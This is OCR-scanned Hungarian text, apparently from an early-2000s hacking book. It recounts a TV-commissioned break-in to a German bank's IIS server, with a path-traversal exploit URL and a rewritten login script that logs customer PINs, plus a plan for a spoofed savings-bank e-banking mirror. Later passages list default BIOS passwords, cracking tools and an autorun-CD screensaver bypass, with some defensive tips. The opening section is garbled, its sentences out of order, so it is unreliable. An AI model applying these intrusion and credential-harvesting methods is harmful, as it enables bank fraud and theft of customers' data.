ami végrehajtáshoz vezet. a sok nem alfanumerikus karakter miatt. illetve nincs szükségük ilyenekre. hogy az első lépés már el volt intézve. hogy tiltva voltak a kimenő kapcsolatok. és ezért a legrosszabb esetben háromszor olyan nagy lehetett volna.7 Az adatletöltés A megváltoztatott scriptek a C:\Temp\ 000043FA. hogy a metakaraktereket idézőjelekbe csomagolva a szintakszisnak megfelelően írták (az ASP-scripthez).. amelybe csak egy kódolt kapcsolattal lehet bejutni. Azonosítás és kapcsolat A weboldalakhoz vezető útvonal így nézett ki: C:\Inetpub\Root\Bank. Végül a fájlt törölni kellett. át lehetett írni a bejelentkező-scriptet úgy. ezeket nem lehetett a böngészőn keresztül bevinni. Hogy ezt a fájlt le lehessen tölteni.: <. Ez azonban meghiúsult azon. meg lehet írni a CMD. A támadási tervről Bináris fájlokat ASP-scripttel írnak.ini könyvtárban tárolják a bank ügyfeleinek folyószámlaszámát. Az IIS „sípolta" a konzolfájlok kiadását.vagy 10-jegyű online számukat. és ezután az echo+%HTTP_COOKIE% -val egyszerűen lehetett írni. környezeti változóként tárolódnak. PIN kódjukat. és a sorok „komplex" módon épülnek fel. és a kívánt bankot (a •••-t vagy a •••-t). Megjegyzés: az adminisztrátor ezt a könyvtárat könyörtelelnül törölhette volna. illetve töltenek fel. hogy egyszerűen féltőkének egy trójait. amely szövegkarakterekből áll. Figyelembe kellett venni.. az SSL miatt) tárolja a rendszer. Az ASP-scriptet. hogy ez a folyamat ne legyen olyan könnyen felfedezhető. A bökkenő az írás volt. hogy a bejelentkező adatok a felhasználói űrlapról közvetlenül egy logfájlba vándoroljanak.> nem lehetett írni. PIN-jét és IP-jét. Az olvasási elérés nem volt probléma: az olvasandó fájlokat a webkönyvtárba másolták.EXE-t. Az ügyfeleket felkérik. például a CMD. ahhoz először a webkönyvtárba kellett másolni. 1. Az utolsó és legnagyobb dobás az volt. Ebben a könyvtárban volt azoknak a fájloknak a nagy része. mint például a HTTP_AGENT vagy a Remote-IP minden kérdésnél. Tehát engedélyezett kapcsolatból kellett olvasni és írni. A cookie-t mint HTTP_COOKIE-t tárolták.exe Itt egy hibáról volt szó egy átadott parancs dekódolásánál és legitimációjánál. Alapvetően az echo DOS-paranccsal lehet fájlokba írni. majd törölték. letöltötték. hogy gépeljék be 6.%c255winnt/system32/cmd.böngészőből. A szövegkarakterekkel nem is volt gond. Tiltott kimenő kapcsolatok Az első terv az volt.EXE-t a /c paraméterrel (egyedüli parancs) futtatták. ezért egyfajta shellt kaptak a böngészőn keresztül.de/scripts/. mint pl. A sorokat tehát cookie-ként küldték el. Az adatok. viszont bináris adatokat és metakaraktereket. mivel a bank scriptjei nem hajtanak végre bináris fájlokat.. l . ami azután kényelmes olvasási és írási elérést kínálna. A szerver támadhatóságának tesztelése A webszerver egy fatálisán szabványos exploitra volt érzékeny: http://www.3. Ezeket az adatokat aztán egy Session Cookie-ban (kódolt. ha a CMD. Ebben a könyvtárban volt egy alkönyvtár. mivel a sornak URL kódoltnak kellett lennie. és ezzel felhasználhatók más alkalmazások számára is. Mivel azonban az ASP-hez és a HTML-hez is metakarakterek szükségesek.. Amint a feltöltő-script a szerveren volt. majd egy hiperhivat-kozáson keresztül lehetett letölteni.EXE-vel. amelyeknek a webszerver a környezete. amelyeket az online banki szolgáltatás használ. és ezért itt már nem kellett foglalkozni vele! .

Az adatokat végül az NDR jogi osztályának adták át.31-ig folyt. Az NDR bizonyítékként csak egy másolatot tartott meg.dat képernyője A logfájlokból kapott adatokkal most már be lehetett jelentkezni az ügyfelek folyószámlájára. Egy folyószámla képernyője Egy részvény-portfólió képernyője S még arra is nyílt lehetőség. A •• bank a Hamburgi Területi Bíróságon 2001.5 Összefoglalás Az említett eseményeket követően a könyv szerzője elbeszélgetett az ismert német biztonsági . amelyet egy semleges közjegyzőnek adtak át Hamburgban. hogy egy pillantást vessenek az ügyfelek részvényletétjére. és ott egy széfbe zárták.04-én elérte.4 Utóirat a bank-hackeléshez A logfájlok áthúzása 2001. IP-címeket) mentettek le.10. hogy Ideiglenes Intézkedést adjanak ki. 08. ahol bezárták egy széfbe ezeket.04-től 2001.A Bank.08. 1. 1.5 millió adatot (online számokat. pineket. amelyben úgy ítéltek. hogy minden adatot vissza kell szolgáltatni nekik. Ebben az időben több mint 1.

hogy nem aggódik a ••• perindítása miatt. Voltak pereim ezelőtt is. az e~banking.de sajnos nem nagyon jó . millió és millió euró birtokában" mondta. PIN-számokat és internetes IP-számokat tartalmaztak. ami gyakran így is történik (nem viszik túlzásba a biztonsági mechanizmusokat és irányvonalakat). és információkat töltsenek le az ügyfelek számláiról. Ruef pontosan ismeri a gondot. hogy feltörjék a bank online banking szerverét. számlaszámokat. Az információk neveket. Az erre hivatott rendszeradminisztrátorok.. Azután van egy félig nyilványos terület. a bank szóvivője szerint jogi lépéseket tervez egy népszerű fogyasztói high-tech tv-show ellen. A nyilvános részt elhanyagolhatják. amelyeknek a birtokába jutottunk. mivel néhány nagy bank biztonsági tanácsadója. a nyilvánosság informálása a ••• számítógépének hiányosságairól nagyon is a köz érdekében történt. amelyek fontosak a biztonságos online banki szolgáltatáshoz.com és a www. most akárhol is lehetnénk a világban.szakértővel. És persze vannak olyan intézmények is." Azt mondta. 4:51 ••••.com tudósításai Német tv-s hackerek bankszervert törtek fel per van kilátásban Ned Stafford. du. aki amúgy jól ismert személyiség Németországban. így ékelődött: „Tudják. A megfelelő szoftver és hardver a naplózáshoz és a biztonsághoz (pl. erős irányvonalak.6 Sajtóbeszámolók A bank-hackelés világszerte nagy visszhangot keltett. Ezeknek az adminisztrációja is többnyire jó . a ••• müncheni szóvivője. Ezzel azt akarom mondani. Szerintem a bökkenő a kiértékelésnél van. A következőket mondta: „Sok bank webes fellépése megosztott. Láttam már olyan banki számítógépeket. tűzfal-elemek és Intrusion Detection System) a pénzügyi szektorban aránylag gyakran a rendelkezésre áll (ellentétben más terület hálózati kapcsolattal működő cégeivel). mivel nincs meg a szükséges háttértudásuk. „A (bankszámla) információkkal. Németország egyik legnagyobb bankja. Németország két közszolgálati tévéhálózatának egyike gyárt. . hogy betörjenek a ••• online banki szerverébe. az törvénytelen. Az „ők". hogy mondjam: vannak ilyenek és olyanok is. Bernd Leptihn. amely hackereket szerződtetett. én 30 éve csinálok törvénytelen dolgokat. aki 27 éve a Technical Adviser frontembere. ezt nyilatkozta a Newsbytes-nak: „Amit tettek. Ösz-szességében azt kell. amelyet mindenki elérhet (WWW/HTTP). hogy a legszívesebben abban a minutumban mondtam volna fel a folyószámlámat. hogy az ARD jogi részlege szerint az ilyesfajta oknyo-mozó újságírást megengedi a német jog.newsbytes. Nem szabad valamennyit egy kalap alá venni. amelyek kitűnő kompetenciával tűnnek ki. 17. Ebben az összefüggésben újra és újra előkerült a biztonság kérdése. szept. íme két érdekes vélemény. Számtalan újság és rádióállomás számolt be az akcióról. Nagyon törvénytelen. A www. ahová csak az ügyfelek léphetnek be megfelelő azonosítást követően (WWW/SSL/SHTTP/ jelszóvédelem). A sztorit vasárnap este közvetítették. és ez meg is történik (a legújabb patchek.kezekben van. Leptihn. ha az „a köz érdekét szolgálja". Newsbytes MÜNCHEN. akikre utalt. a Technikai Tanácsadó nevű tv-show. Mindenesetre bőven van még tennivaló. Leptihn szerint. de most a kamera mögött dolgozik.washingtonpost. Cornelia Klaila. A Technikai Tanácsadó augusztusban felfogadott néhány fiatalembert. biztonsági megbízottak vagy auditorok nem tudnak mit kezdeni a biztonsági rendszer logfájljaival. a bankok biztonsági problematikájáról. Marc Riief-fel. megfelelő biztonsági intézkedések). NÉMETORSZÁG 2001. biztosított rendszer. Az e-banking területet védeni kell." 1. hogy van egy nyilvános rész.. a Technikai Tanácsadó (Ratgeber Technik) hírszerkesztő csoportjának hamburgi vezetője azt nyilatkozta a Newsbytes-nak. de mostanáig soha nem vesztettem el egyetlen ügyet sem.. amelyet az ARD.

A zdnet. a hackereknek dispo-kredit adatokat is sikerült elérniük. „A hackereink ismét próbálkoztak az új site-on. 2001. hogy a ••• banknál bizony van néhány nagy biztonsági rés.5 millió online könyvelési akciót megszerezni. hogy a kutatás megmutatta. hogy a weboldalt a szokásos rendszeres karbantartás és nem a biztonsági rések kijavítása miatt állították le. A tévéadó komputeres szakemberei ismételten óvtak a trójaiktól. Még egy laptoppal és egy adatátvitelre alkalmas mobiltelefonnnal is gond nélkül lehet jogosulatlanul pénzt átutalni." Miután a Technikai Tanácsadó vasárnap éjszaka a tévében megszellőztette az ügyet.7 Tapaszatalatok más bankoknál Nem csak a ••• nincs felvértezve a támadások ellen. 22 évesen a Multimedia Network Systems cég ügyvezetője Leinefeldében. ezt nyomatékosan kétségbe vonta. Miután a magazin figyelmeztette a •••-t központi számítógépének a hiányosságaira." Weide és Leptihn elmondták. Azt nem árulta el. hogy a ••• online banking oldala vasárnap késő éjjeltől kezdve úgy hat órára leállt.vélekedett. mert ez a bank különösen „lukacsosnak" bizonyult a jogosulatlan hozzáférésekkel szemben. hogy ő és a csapata részt vettek egy telekonferenciás hívásban a ••• technikai személyzetével.mondta. Behatolásuk bizonyítására a betolakodók csupán egy 100 márkás könyvelésre „korlátozták magukat". és sikerrel jártak" -állította. féltek. De elvileg sok más banknál és takarékpénztárnál is lehetséges lenne egy virtuális betörés. A régi weboldalt szeptember elején offline-ba helyezték. Négyük közül az egyik Stephan Weide. más bankoknál is csak félig-meddig . a régi és az új is online-ban voltak. hogy a betörés a ••• számítógépébe csak két-három napot vett igénybe. a bank szóvivője. ami biztonságos.de News tudósítása ARD: Online banki szolgáltatásbeli hiányosságokat lepleztek le PIN-eket és TAN-eket olvastak ki bekapcsolt kamera előtt. hogy az új oldal az utolsó éjszaka előtt biztonságos lett volna. Augusztus hónap folyamán . működő kamera előtt törték fel a ••• biztonsági mechanizmusait. hogy publicitást nyerjenek induló internetes biztonsági tanácsadó cégüknek . Weide azt nyilatkozta a Newsbytes-nak. Ahogy az ARD a továbbiakban közölte. de ez „nem volt sok". Az adó által felfogadott hackerek azonban ebben az átdolgozott programban is találtak réseket. A bank a Microsoft Internet Information Serverét (IIS 4." . hogy a technikaiak hangot adtak-e haragjuknak a hackelés miatt. az online-számokat (TAN) és az IP-címeket.t választották. Azt hiszem. bárki meg tudta volna tenni. így a szerkesztőknek és a szakértőknek a műsor adatai szerint lehetővé vált néhány napon belül 1. 1. hogy a ••• bank ezen a nyáron egy új online weboldalt helyezett üzembe. és nem az újra törtek be. és a hackerek a régi weboldalra. A fiatal hackerek inkább abban voltak érdekeltek. 08:46 óra Thüringiai hackerek a Ratgeber: Technik ARD-magazin megbízásából. A Technikai Tanácsadó megbízott egy négytagú hackercsapatot. Mikor megkérdeztük. „Még el kell döntenünk. hogy elveszítik az állásukat. s így. Klaila. hogy megmondják nekik.Leptihn arra is utalt. szeptember 17. azt mondta: „Nem mondtak csúnya szavakat. és „igazán nem volt gond. hogyan tudják befoltozni a réseket. hogy bűntetőjogi és polgári peres kártérítési per is lehetséges a Technikai Tanácsadó ellen. Leptihn viszont vitatta. Klaila azt mondta. beleértve titkos kódokat (PIN). a számlákat a kimerítésig terhelhették volna. Azt is jelezte. mit is akarunk tenni. Weide azt mondta. hogy mennyit fizettek nekik. egy új log-in redszert vezettek be. amelyek értelmetlenné teszik a pénzintézet kódolási eljárását. és hogy ez az oldal state-of-the-art rendszer.mint mondta mindkét oldal. A Ratgeber szerkesztősége szerint azért a •••.0) használta.. s azt állította.

7. 1. A szerverek többnyire jól védettek. Ezen a webszerveren gyakran tisztán reprezentatív célokból futnak olyan alkalmazások. Többnyire egy helyben lévő vagy szolgáltatón keresztül kezelt szerverről van szó. Ezt a takarékpénztáraknál gyakran számítóközpontok kezelik. amelyek nagyon támadhatóvá teszik a szervert. mint a legtöbbnek Németoszágban: két részből áll. és amelyen keresztül egy linkkel a folyószámlájához jut. amelyeket az előző akciókból gyűjtöttek. A tapasztalatokból. és a rendszergazda is szívesen elhanyagolja.sikeresek a szerverük védelmére irányuló intézkedések.a kleinmusterhauseni takarékpénztár Ennek a tararékpénztárnak olyan az internetes megoldása. és ki lehet indulni abból. Van a nyilvános rész. amely csak nagyon egyszerűen védett. egy maghatározott URL begépelésével Itt az átmenet a home-bankinghoz . amelyben az ügyfél az illető tararékpénztárról információt szerezhet. Bepillantás egy német tararékpénztár jelszó-fájljába. Nyíltszívűen .1 Forgatókönyv a takarékpénztár-területen 2001 októberében a szerző újabb megkeresést kapott valakitől. aki a különböző bankok visszásságainak a feltárására tararékpénztárak biztonsági auditjával bízta meg. A második terület a tulajdonképpeni e-banking. Ez általában egészen egyszerű felépítésű. hogy egy támadás ez ellen a számítógép ellen semmiféle sikerrel sem járna. a következő terv született.

illetve takarékpénztár nyilvános szerverének az elérését.A támadási terv Először egy biztonsági rést próbáltak keresni. Ez ebben az esetben egy script-hiba vagy egy hibás FTP-szerver lenne. A betörés után megváltoztattak minden oldalt. amely lehetővé teszi az illető bank. amelyen többnyire HBCI-eszközök meghajtóit vagy különböző online banking szoftverek frissítéseit tárolják. amelyek a számítóközpontban elhelyezett tulajdonképpeni e-banking gépre mutattak. Isten hozta a tararékpénztárnál -csak az URL-nek kell a megfelelőnek lenni Példa egy tararékpénztári oldal forrásszövegére megfelelő linkeléssel a számítógép-központhoz A hamisítvány veszi át a szerepet A megfelelő oldal külleméről és működési módjáról rendelkezésre álló információk alapján .

a tranzakciószámok továbbra is érvényben maradnak. Ha most egy átutaláshoz beírja az adatokat.hozzákezdtek egy hamisítvány felépítéséhez. ezek az adatok egy logfájlban landolnak. „A kockázatokról és mellékhatásokról kérdezze banki tanácsadóját!" . Az ügyfél ugyanazokat az információkat és opciókat látja maga előtt. mint a valódi e-banking gépen. Ez a hamisítvány a tuljdonképpeni e-banking számítógépet „tükrözné". hanem csak a logfájlba vándorol. tehát az ügyfeleket a helyi tararékpénztár prezentációjáról a megváltoztatott Folyószámla vagy Onlinebanking link közvetlenül a hamisítványra vezeti. Mivel a tranzakciók egyike sem lesz végrehajtva.

2.4 Automatikus lejátszás .1 A hackeren túl .2.a bennfenteseknek nem okoz problémát 2.6 Óvintézkedések 2.3 Jelszavak a Windows 2000 alatt 2. vigyázat! 2.a betörés előkészítése CD-vel 2.1.1.3 Milyen lehetőségeik vannak a betolakodóknak? 2.3.4 További támadási technikák .3 Képernyővédő-jelszó .3 A távoli elérésű támadás internet.2.3.2 A jelszófájlok 2.1 Különbségek a Windows 9x.merevlemez-fejreállás. és hogyan működnek? 2.veszélyes biztonsági rések 2.3.3.1.2 A jelszavak kikémlelése 2. az NT és utódai között 2.1.4 Jelszóval védett megosztások 2.1 A fájl.Tartalom 2. fejezet .1 Érdekes jelszavak szinte mindenütt akadnak 2.vagy hálózati felhasználók. adatbetekintés vagy lopás 2.5 Brute Force-rohamok a megosztási jelszavak ellen 2.2.és nyomtatómegosztás .2 Mik azok a szkennerek.2 A fizikai támadás 2.3.3.

hogy minél öregebb egy számítógép. A BIOS-jelszavas lezárás megkerülésének.merevlemez-fejreállás. 2000) gyenge pontjai a számítógép ebédszünetben bekapcsolva marad. Hogy mennyire biztonságosak a jelszóval védett képernyőkímélők. A magánfelhasználók. és vele együtt a BIOS. ami sok . Alapigazság. adatbetekintés vagy lopás A biztonság tulajdonképpen az adatok biztosítási lehetőségeinek az alapvető mérlegelésénél kezdődik. ami a 9x-nél kiegészítő szoftvertől függ. A Windows 95/98/ME-t érő támadásoknak két fajtáját kell megkülönböztetni. 2.1 Különbségek a Windows 9x. amit olyan valaki hajt végre. akik a Windows XP Home Editionnel fognak dolgozni) többnyire csak csekély ismeretei vannak a biztonságról. az NT és utódai között A különböző operációs rendszerek közötti alapvető különbség. hogy ezt a védelmet megkerülve jussanak be a rendszerbe. a másik a távoli elérésű támadás. Míg a Windows 95/98/ME fejlesztésénél a Microsoft a felhasználóbarátság kedvéért elhanyagolta a biztonságot. Emellett az NT-nél és a Windows 2000-nél az adatokat már eleve zárolni lehet. mielőtt a grafikus felület megjelenne. hogy behatoljanak a rendszerekbe.2 A fizikai támadás A számítógépek védelmének nem túl gyakori módja a BIOS-jelszó beállítása. Manapság szinte minden számítógép-használónak vannak olyan adatok a gépén. Ráadásul a felhasználói operációs rendszerek gazdái is nagyon megkönnyítik a támadók dolgát.A Windows-rendszerek (9x. lopás stb. Az NT vagy a Windows 2000-es gépeknél ott van még a jelszavas bejelentkezés. például egy lopásét. Az egyik a fizikai támadás. 2. A Windows 95/98/ME felhasználóinak (és valószínűleg azok nagy részének is.1. mint köztes fokozat. annál könnyebb kikerülni. Mivel az adataink nem csak az internetes szörfözés közben vannak veszélyben. ami a BlOS-jelszónál kezdődik. És akkor a további kockázatokat. amelyeknek az adataikat kiteszik.) vagy a hibás kezelés veszélyezteti.1. Így a felhasználók ezekkel az operációs rendszerekkel a jövőben is könnyű prédái lesznek mindenfajta hackertámadásnak. illetve feltörésének három alapvető módját különböztetjük meg: • általános jelszó használata a jelszó megszerzése a memóriából • a CMOS szoftverének törlése . NT. a hackereknek arra is vannak módszereik. akinek közvetlen elérése van a rendszerre.esetben egyáltalán nem történik meg.1 A hackeren túl . illetve feltörni a védelmet. de gyakran még a vállalatok is visszariadnak egy jó tűzfal költségeitől. még figyelembe se vettük: ugyan ki szeretné az utolsó adóbevallását vagy bizonyos leveleit rossz kezekben tudni? Az egyedülálló PC-t ugyan inkább a külső hatások (vírusok. ez a fejezet az adatbiztonság egészével foglalkozik. a professzionális területre készült termékek (Windows NT 4. illetve az újbóli előállítása a PC árának többszörösébe kerülne. vagy a kényelem kedvéért lemondanak a BIOS-jelszóról. amelyet a felhasználónak a számítógép minden indításához be kell írnia. A hackereket egyenesen csalogatják a gyenge pontok. amelyeknek az elvesztése.a legtöbb? . amelyet az internetről indítanak. ha 2. ennek ellenére rengeteg más lehetőség is van hozzáférni a személyes adatokhoz: otthon vagy az irodában alapvetően mindenki odaülhet a géphez . azt a későbbiekben megmutatjuk. amely növeli a biztonságot. az XP-vel fog megszűnni: az eddigi Windows 9x vonal csak korlátozott védelmet (BIOS-jelszó) kínál a jogosulatlan felhasználás ellen. és azokról a veszélyekről. Sajnos.0 és Windows 2000) tervezésénél sokkal tudatosabban koncentrált erre a témára.és még a legfifikásabb BIOS-jelszó sem ér sokat. ami igazán csak most.

hogy a gép már elindult.de AMI Award Gyártó: AMI PASSWORD Ami A. vagy már teljesen elavultak. Ezekkel a jelszavakkal a számítógépet az utoljára használt és mentett jelszótól függetlenül lehet elindítani. A különböző BIOS-verziókhoz különböző programok vannak. hogy vajon még működnek-e. és minden BIOS-verzióhoz használható. ilyenkor ugyanis segédprogramokkal el lehet érni a memóriában tárolt jelszót. a használatuknál azonban figyelni kell az amerikai billentyűzetkiosztásra. Ezeket a jelszavakat számos oldalról be lehet szerezni az interneten.hackerzbook.1 Password for AWARD BIOS BIOS Szerző Danny Soft The Immortal Ismeretlen Oren Levy .hackerzbook.Dynam ic FalCoN 'N' AleX Forrás www.M. Azt persze figyelembe kell vennie. arra az esetre. AMI?PW AMI?SW AMI_SW AMI Gyártó: Phoenix PHOENIX phoenix CMOS BIOS Altalános jelszavak aLLy Wodj SZYX Syxz Sxyz SKY_FOX setup AMI általános Password (C)alculator AWARD J262 J256 j262 j256 AWARD_SW 589589 AWARD_PW AWARD_PS AWARD?SW AWARD SW AWARD 589721 Általános BlOS-jelszavak Programok a jelszó kiderítéséhez a memóriából SER LKWPETER Ikwpeter HLT A CMOS szoftverének törlése Ha a hacker nem talál általános jelszót vagy megfelelő segédprogramot. de valójában a legtöbbnél kérdéses. Ez a segédprogram minden beállítást töröl. hogy ilyenkor a rendszerbeállítások is elvesznek.hackerzbook. . Mindenesetre a rendszernek már futnia kell a használatához. ha a biztonságáért aggódó felhasználó egyszer el találná felejteni a jelszavát. nem marad más hátra.hackerzbook.de www. A BIOS törléséhez megint csak segédprogramokat használnak a „betörők".I. A KiLLCMOS32 minden BlOS-beállitást megbízhatóan töröl CONDO awkward BIOSTAR A jelszó megszerzése a memóriából A jelszó memóriából történő megszerzése feltételezi.hackerzbook. ezek közül az egyik legismertebb a KiLLCMOS32. mint törölni a BIOS-t. Gyártó: Award BIOSSTAR BIOSTAR ALFAROME q_127&z J64 Password-BlOS-Hacker Oren Levytől Program AMIDECOD Award Modular Bios crack tool CrackAmiBios 1. amelyeket könnyen be lehet szerezni az internetről. és azzal együtt a jelszót is.de www.de www.de www. Ezeknek a jelszavaknak a többségét sikerrel teszteltük.Általános jelszó használata A különböző BIOS-verziók gyártói adnak egy általános vagy default jelszót.

A program egy érvénytelen értéket helyez el a CMOS-ban, és ez úgy hat, hogy minden ott tárolt adatot (a jelszót is) újra meg kell adni. A használatának a feltétele azonban az, hogy a számítógép már működik, és szabad a hozzáférés. A http://www.memosys.com/passwort/faq.htm címen további információk találhatók a BIOS-jelszavakról. A jobban informált internet-felhasználók néha azt hiszik, hogy egy rendszert csak az internetről érhetnek támadások, és ez ellen egy tűzfallal jól meg is védik a gépüket. De mi van akkor, ha valaki mondjuk az ebédszünetben fizikailag fér hozzá a számítógéphez? Milyen módszereket fog alkalmazni, hogy kikerülje a képernyővédőt és jelszavakat olvasson ki?

A Windows a jelszó megerősítését kéri

2.1.3 Képernyővédő-jelszóa bennfenteseknek nem okoz problémát
Hogy a számítógépünk rövid távolléteink alatt is védve legyen a kíváncsi szemektől, arról a Windows 95/98/ME alatt a legegyszerűbben képernyővédőjelszóval gondoskodhatunk. Ez a képernyővédő bekapcsolása után csak a megfelelő jelszót megadó felhasználónak engedi meg a rendszer elérését.
Ha a Windows csővezetéket épít vagy Beziergörbéket mutat - csak jelszóval lehetséges a visszatérés

így lehet feltörni a jelszóvédelmet
Az alábbiakban megvilágítjuk, milyen könnyű egy képernyőkímélő jelszavát kikapcsolni, illetve kikerülni, ha a hackernek ehhez elég ideje és tudása van.

Újraindítás
Windows 95/98/ME alatt a Képernyő tulajdonságai ablakban a Képernyőkímélő regiszterlapon a képernyőkímélő bekapcsolása után zárolni lehet a rendszer elérését. Ha mások is hozzáférnek a PC-nkhez, alapvetően be kell állítanunk ezt a jelszót, mert különben könnyen űzhetnek velünk csúnya tréfát: képzeljük el, hogy valaki három perc után induló jelszavas képernyővédőt állít be a gépünkön. Ezután elég egy rövid szünet (telefon vagy hasonló), és máris megakasztotta a munkánkat. Hiszen jelszó híján nem jutunk a PC-hez újraindítás nélkül. Akkor viszont elveszhetnek az adatok, amelyeket esetleg még nem mentettünk el - nagy az ár. Igazán dühödt, primitív, de hatásos módszer a képenyőkímélő-jelszó kikerülésére: a számítógép újraindítása a rését gombbal. Figyelembe kell venni, hogy a nem mentett adatok minden esetben elvesznek, így például a nem mentett Word-dokumentumok vagy a nyitott fájlok stb. Szerencsére ilyenkor a rendszer felhasználója észreveszi a behatolást.

Taskmanager - kapu a betörőnek Windows 95 alatt
Windows 95 alatt a Microsoft még egyszerűbb módot kínál a képernyőkímélő kikerülésére: a Ctrl+Alt+Del billentyűkombináció lenyomásával • mondhatni „majomfogással" - célzottan be lehet zárni a képernyőkímélő program taskját.

Rossz csillagzat alatt született a védelem: egy egérkattintással be lehet zárni a képernyőkímélőt

A Windows 95/98/ME a CD-ROM-meghajtóhoz alapértelmezésként az autoplay (automatikus lejátszás) opciót használja, amelyet a Microsoft Knowledge Base Article Q141059 a következőképpen definiál: „A Windows folyamatosan ellenőrzi a CD-ROM-meghajtót, hogy megállapítsa, helyeztek-e bele CD-ROM-ot. Ha ilyen lemezt fedez fel, ellenőrzi, hogy van-e rajta autorun.inf-fájl. Ha a CD tartalmaz ilyen fájlt, akkor végrehajtja a fájl open= sorába írt parancsokat." Megjegyzés: ezt a témát még a 4.fejezet is tárgyalja, mert az automatikus lejátszás funkciót gyakran használják trójai vírus becsempészésére idegen rendszerekbe. Ehhez lehet a rendszer esetleg futó internetkapcsolatait (vagy hálózatoknál a LAN-kapcsolatokat) használni, és így a PC-hez a képernyőkímélő-jelszó ellenére hozzá lehet férni. Ha a trójai már bent van, a képernyőkímélő-jelszót egészen egyszerűen ki tudja kerülni. Egy ilyen hozzáféréssel a képernyőkímélő-jelszót is ki lehet kapcsolni úgy, hogy: HKEY_CURRENT_USER/Control Panel/desktop/ScreenSaveActive Registrykulcs értékét nullára állítjuk. Van néhány program, amelyeket az automatikus lejátszás funkcióval, a jelszómegadást kikerülendő, fel lehet másolni. Ezeknek a programoknak egyike a Clean Screen. Íme, a használati utasítás, amellyel szükség esetén magunkat is kiszabadíthatjuk (az előkészületeket azonban előre meg kell megtenni, nehogy túl késő legyen): 1. Letölteni (www.hakerzbook.de) és kicsomagolni a ZIP fájlt! 2. Az EXE fájlt és az autostart-ini-t CD-re írni. A két fájlnak a könyvtárfán egészen felül kell lennie, tehát ne valamilyen alkönyvtárba másoljuk. 3. Ha a CD-írás elkészült, akkor egyszerűen próbáljuk ki egyszer a saját PCnken. 4. Képernyőkímélő-jelszó beállítása, majd várakozás, míg a képernyőkímélő elindul. 5. Tegyük az újonnan megírt CD-t a meghajtóba, és várjunk, amíg a PC hangszórója sípolni kezd. Ha nincs bekötve, egyszerűen várjuk ki, míg a CD-ROM-meghajtó leáll. 6. Ezután már csak írjuk be a jelszó lekérdezésére az 123-at, és a képernyőkímélőnek el kell tűnnie!

Védelmi lehetőség Windows 95 felhasználóknak
Ez ellen a támadás ellen csak a Windows 95 Windows 98/ME-re frissítése nyújt védelmet. A képernyőkímélő-jelszó elkerülésének ilyen kísérletei az NT/2000-nél is hatástalanok. A későbbiekből az is ki fog derülni, hogyan is lehet feltörni az ilyen jelszót, mert a jelszavas védelem is csak korlátozott mértékben nyújt biztonságot. A jelszó megfejtése a megfelelő szoftvereszközzel igazán egyszerű, jobb, ha tudjuk, hogy mennyire az. így persze rögtön magunkon is segíthetünk, ha elfelejtettük a saját jelszavunkat.

2.1.4 Automatikus lejátszás a betörés előkészítése CD-vel
A PC-t a BIOS-szal, a képernyőkímélőt jelszóval zároltuk, és talán még a jelszót is úgy választottuk meg, hogy az betűk és számok kombinációjából álljon - most aztán a PC-nk szünetben is bevehetetlen, vagy lehet, hogy mégsem? A következőkből kiderül, hogy milyen eszközöket vethet be ebédszünetben egy potenciális hacker, hogy minden igyekezetünk ellenére hozzáférjen az adatainkhoz.

7. Ezután a program kiírja a régi jelszót, és a Régi érték beállítása paranccsal vissza lehet állni rá. Ha ezt nem tesszük meg, aktuális jelszóként a 123-at tárolja.
A képernyőkímélő-jelszó megszerzése autoplay CD-vel

A képernyőkímélő jelszó kikódolása A képernyőkímélő jelszót a Windows 95/98/ME alapértelmezésként a HKEY\USERS\.Default\Control Panel\Sreen_Save_Data Registry-kulcsban tárolja. A kódolása nagyon egyszerű, és számos programmal feltörhető. A legtöbb programnak az a hátránya, hogy csak akkor működik, ha a képernyőkímélő még nem aktív (hogy mit tehetünk, ha már az, azt már tudjuk).
Jelszófeltörő program működés közben

Védekezés az automatikus indításos támadások ellen Ezeket a támadásokat úgy védhetjük ki, ha a Windows 95/98/ME alatt kikapcsoljuk az automatikus lejátszás funkciót. Ez a következőképpen működik: A Vezérlőpulton kattintsunk duplán a Rendszerre, válasszuk az Eszközkezelő fület, kattintsunk duplán a CD-ROM-ra, és aztán a CD-ROM meghajtófára. A Beállítások regiszterlapon távolítsuk el a pipát az Automatikus lejátszás elől.
Itt találjuk a döntő fontosságú pipácskákat

Néhány program a képernyőkímélő-jelszó feltöréséhez:
Program SCR-it! - 1 .0 verzió SCRNLOCK SS_D 1.0 Win95 Screen Saver Password Cracker v1 . 1 Programok a képernyőkímélő-jelszó feltöréséhez Szerző Yoto Yotov Yoto Yotov Bubble nobody weboldal www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de

2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak
A helyi támadásoknál nagy szerepe van a jelszavak kikémlelésének. Jelszófeltörők segítségével a hackerek szinte minden, Windows alatt tárolt jelszót meg tudnak szerezni, hogy azután elérjenek velük jelszóval védett fájlokat, az

mert akár odáig vezethet..silicon. hétfő . Példa: ha a Windowsba Jani néven jelentkezünk be. akik mit sem sejtő PC-tulajdonosok költségére szörföztek az interneten.2. az adatokat kiolvasva.. tehát a c:\windows\ alatt.számol be a Der Spiegel hírmagazin nemrégiben megjelent tudósítása. Az Internet Explorer a 4. A PWL a PassWord Library rövidítése. Jelszavak ezreit törték fel de. íme egy aktuális példa: 2001. A dortmundi és a münsteri államügyészség két nagy ügyében kerek kétmillió márkára becsüli a károkat. Praktikus segítség a felhasználóknak és a betörőknek . A kódolt jelszó az első pillantásra még ártalmatlan Németország: Hackerek milliós csalása A nyomozók hackerek nagy szabású csalásainak a nyomára bukkantak. (dpa) Forrás: www.internetet vagy a hálózatot. A mit sem sejtő felhasználók számlájára esetenként akár havi 20 ezer márkáért is interneteztek.2 A jelszófájlok A Windows 95/98/ME PWL fájlokban tárolja a jelszavakat és a felhasználói neveket. a fájlnév pedig a mindenkori felhasználó neve lesz. amely a belépési adatok megadása után megkérdezi a felhasználótól. Sajnos. illetve ezek bizonyos területeit. hogy adatokat tudjon elhelyezni bennük. 30 feltételezett tettesből álló kör több ezer számítógép-felhasználó jelszavát törte fel . Egy kb.az automatikus kiegészítés A dortmundi államügyészségnél több mint 1000 eljárás van folyamatban gyanúsítottak ellen egész Németországban.de Internetezzünk olcsón sokkal több nem is kell hozzá Az így tárolt információkat egy jelszófeltörő segítségével nagyon könnyű kiolvasni. A Windows 95/98/ME alatt minden program eléri a PWL fájlokat. Minden felhasználói profil tartalmaz egy saját PWL fájt. Ezek az ügyek azonban az államügyész adatai szerint már egy fél évvel ezelőttiek. A Windows minden PWL-fájlt a Windows könyvtárban tárol. hogy szeretné-e menteni ezeket.pwl lesz. a 